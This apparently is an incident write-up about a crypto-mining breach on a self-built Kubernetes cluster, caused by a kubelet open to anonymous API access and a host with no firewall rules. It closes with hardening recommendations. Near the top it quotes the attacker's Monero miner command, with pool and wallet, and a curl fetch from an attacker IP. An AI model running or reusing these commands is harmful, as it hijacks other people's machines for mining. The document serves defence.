How a Misconfigured Kubelet Led to a Crypto‑Mining Breach and How to Secure Your Cluster

Invasion Phenomenon

During routine checks a machine in a self‑built Kubernetes cluster was found running an abnormal process that turned out to be a crypto‑mining program.

<code>./.system -o pool.supportxmr.com:3333 --donate-level=1 --coin=monero -u 46EPFzvnX5GH61ejkPpNcRNm8kVjs8oHS9VwCkKRCrJX27XEW2y1NPLfSa54DGHxqnKfzDUVW1jzBfekk3hrCVCm</code>

<code>curl -s http://45.9.148.35/scan_threads.dat</code>

The machine was being used for mining, and the Docker service was stopped immediately while the malicious binary was dumped for analysis.

Specific Cause Investigation

iptables empty

The host had no iptables rules, leaving it completely exposed to the network.

kubelet exposed

Investigation revealed that the kubelet component was compromised; logs showed suspicious entries indicating direct API access.

kubelet misconfiguration

The kubelet was started with parameters that allowed anonymous API access. A critical configuration line had been mistakenly commented out, disabling the intended restriction on anonymous access.

Because the affected node was newly added, the issue was detected quickly, and the rest of the cluster was inspected to ensure no similar exposure existed.

Improvement Plan

Enforce a default‑deny firewall on each node, closing all ports unless explicitly opened for administrative access.

Avoid assigning public IPs to nodes that do not need external exposure; limit internet‑facing services.

Configure kubelet and other services to bind only to internal network interfaces instead of

0.0.0.0

.

Implement strict authentication for any anonymous access paths and consider a dedicated authorization system.

Adopt scripted, auditable procedures for production changes rather than manual operations to reduce human error.

Conclusion

The breach gave the attacker full control over Docker on the compromised node, highlighting the severity of misconfigurations. Strengthening host firewalls and limiting unnecessary port exposure are the quickest and most effective steps to improve cluster security.